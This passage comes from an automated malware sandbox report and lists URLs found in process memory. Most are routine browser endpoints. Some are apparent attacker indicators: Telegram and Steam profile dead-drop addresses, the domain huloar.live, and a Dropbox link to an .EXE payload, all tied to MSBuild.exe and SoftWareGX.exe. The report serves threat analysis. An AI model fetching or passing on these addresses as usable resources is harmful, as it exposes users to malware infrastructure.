                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
                Source: 000003.log11.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
                Source: chrome.exe, 00000011.00000003.1446870409.000046FC035A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?lang=en&family=Product
                Source: chromecache_698.18.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
                Source: chromecache_698.18.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
                Source: chromecache_698.18.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
                Source: chromecache_698.18.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://gaana.com/
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/1
                Source: chrome.exe, 00000011.00000003.1410073257.000016400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/4
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/;
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/E
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/M
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/O
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/P
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/R
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Z
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/a
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/c
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/d
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/f
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/m
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/n
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/u
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/x
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                Source: chrome.exe, 00000011.00000003.1410073257.000016400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/Y
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1453168510.000046FC0400C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1453273412.000046FC04026000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1411127055.0000164000878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                Source: chrome.exe, 00000011.00000003.1410073257.000016400071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
                Source: msedge.exe, 00000013.00000002.1551181144.00000C34002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                Source: 1ddcd8e3-07be-4b08-a481-09c222a4e74b.tmp.22.drString found in binary or memory: https://hbx.media.net
                Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huloar.live
                Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huloar.live/
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
                Source: 2noh4e.15.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CLXfQbX4pbW4QbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                Source: chrome.exe, 00000011.00000003.1410073257.000016400071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                Source: chrome.exe, 00000011.00000003.1412646213.0000164000904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                Source: chrome.exe, 00000011.00000003.1410073257.000016400071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                Source: chrome.exe, 00000011.00000003.1452230131.000046FC03F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardF
                Source: chrome.exe, 00000011.00000003.1410073257.000016400071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                Source: chrome.exe, 00000011.00000003.1412646213.0000164000904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
                Source: chrome.exe, 00000011.00000003.1410073257.000016400071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                Source: chrome.exe, 00000011.00000003.1446902159.000046FC0355C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446713708.000046FC034DF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446074641.000046FC0355C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446902159.000046FC03578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
                Source: chrome.exe, 00000011.00000003.1432722007.000046FC032C6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432562852.000046FC02525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                Source: chrome.exe, 00000011.00000003.1432722007.000046FC032C6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432562852.000046FC02525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                Source: chrome.exe, 00000011.00000003.1411127055.0000164000878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                Source: chrome.exe, 00000011.00000003.1410073257.000016400071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://m.kugou.com/
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://m.soundcloud.com/
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://m.vk.com/
                Source: chrome.exe, 00000011.00000003.1446902159.000046FC0355C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446713708.000046FC034DF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446074641.000046FC0355C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446902159.000046FC03578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
                Source: msedge.exe, 00000013.00000002.1551181144.00000C34002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                Source: msedge.exe, 00000013.00000002.1551181144.00000C34002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                Source: Cookies.22.drString found in binary or memory: https://msn.comXANDR_PANID/
                Source: Cookies.22.drString found in binary or memory: https://msn.comXANDR_PANIDv10
                Source: Cookies.22.drString found in binary or memory: https://msn.comXID/
                Source: Cookies.22.drString found in binary or memory: https://msn.comXIDv10
                Source: Cookies.22.drString found in binary or memory: https://msn.comreceive-cookie-deprecation/-
                Source: Cookies.22.drString found in binary or memory: https://msn.comreceive-cookie-deprecationv10dK
                Source: Cookies.22.drString found in binary or memory: https://msn.comtluidp/.;
                Source: Cookies.22.drString found in binary or memory: https://msn.comtluidpv1061
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://music.amazon.com
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://music.apple.com
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://music.yandex.com
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
                Source: chrome.exe, 00000011.00000003.1427109914.000046FC0319C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
                Source: 000003.log6.21.dr, 2cc80dabc69f58b6_0.21.dr, 4cb013792b196a35_0.21.drString found in binary or memory: https://ntp.msn.com
                Source: 000003.log3.21.dr, Network Action Predictor.21.dr, 000003.log1.21.drString found in binary or memory: https://ntp.msn.com/
                Source: QuotaManager.21.drString found in binary or memory: https://ntp.msn.com/_default
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.dr, 000003.log1.21.drString found in binary or memory: https://ntp.msn.com/edge/ntp
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.dr, 000003.log1.21.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
                Source: Session_13382730677706579.21.drString found in binary or memory: https://ntp.msn.com/edge/ntp?&form=MT004B&OCID=MT004B
                Source: Session_13382730677706579.21.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
                Source: QuotaManager.21.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
                Source: 000003.log6.21.drString found in binary or memory: https://ntp.msn.comHI
                Source: msedge.exe, 00000013.00000002.1551181144.00000C34002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                Source: chrome.exe, 00000011.00000003.1446816707.000046FC035C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                Source: chrome.exe, 00000011.00000003.1447213026.000046FC02494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                Source: chrome.exe, 00000011.00000003.1446816707.000046FC035C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                Source: chrome.exe, 00000011.00000003.1446816707.000046FC035C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://open.spotify.com
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://outlook.live.com/mail/0/
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://outlook.office.com/mail/0/
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                Source: chrome.exe, 00000011.00000003.1427109914.000046FC0319C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
                Source: chrome.exe, 00000011.00000003.1432722007.000046FC032C6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432562852.000046FC02525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                Source: chromecache_698.18.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
                Source: chrome.exe, 00000011.00000003.1427109914.000046FC0319C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.drString found in binary or memory: https://sb.scorecardresearch.com/
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comb
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.drString found in binary or memory: https://srtb.msn.cn/
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.drString found in binary or memory: https://srtb.msn.com/
                Source: chrome.exe, 00000011.00000003.1446580751.000046FC02498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: chrome.exe, 00000011.00000003.1446713708.000046FC034DF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446074641.000046FC0355C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1447058718.000046FC03646000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                Source: SoftWareGX.exe, 00000005.00000002.1305831427.0000000004D29000.00000004.00000800.00020000.00000000.sdmp, SoftWareGX.exe, 00000005.00000002.1305403965.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp, SoftWareGX.exe, 00000005.00000002.1305831427.0000000004CC9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199820567237
                Source: MSBuild.exe, 0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199820567237hac22tlMozilla/5.0
                Source: MSBuild.exe, 0000000F.00000002.2016179797.0000000004602000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: MSBuild.exe, 0000000F.00000002.2016179797.0000000004602000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                Source: SoftWareGX.exe, 00000005.00000002.1305831427.0000000004D29000.00000004.00000800.00020000.00000000.sdmp, SoftWareGX.exe, 00000005.00000002.1305403965.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp, SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D6B000.00000004.00000800.00020000.00000000.sdmp, SoftWareGX.exe, 00000005.00000002.1305831427.0000000004CC9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2006634073.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2006634073.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m08mbk
                Source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/m08mbkhac22tl
                Source: MSBuild.exe, 0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/m08mbkhac22tlMozilla/5.0
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://tidal.com/
                Source: 1ddcd8e3-07be-4b08-a481-09c222a4e74b.tmp.22.drString found in binary or memory: https://trace.mediago.io
                Source: 1ddcd8e3-07be-4b08-a481-09c222a4e74b.tmp.22.drString found in binary or memory: https://trace.popin.cc
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://twitter.com/
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://vibe.naver.com/today
                Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://web.telegram.org/
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://web.whatsapp.com
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
                Source: MSBuild.exe, 0000000F.00000002.2006634073.000000000100B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2013453032.00000000043EA000.00000004.00000020.00020000.00000000.sdmp, 2noh4e.15.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_39e4b8f6fd6635158ad433436bdaa069841cfdf8e1989e03
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://www.deezer.com/
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
                Source: MSBuild.exe, 0000000F.00000002.2011477912.00000000040A7000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2006634073.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2006634073.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/ug8gna48ijslhqchxc0ec/67937ef0b237a.EXE?rlkey=tj0v2wuhbs6521y6cnm79fu
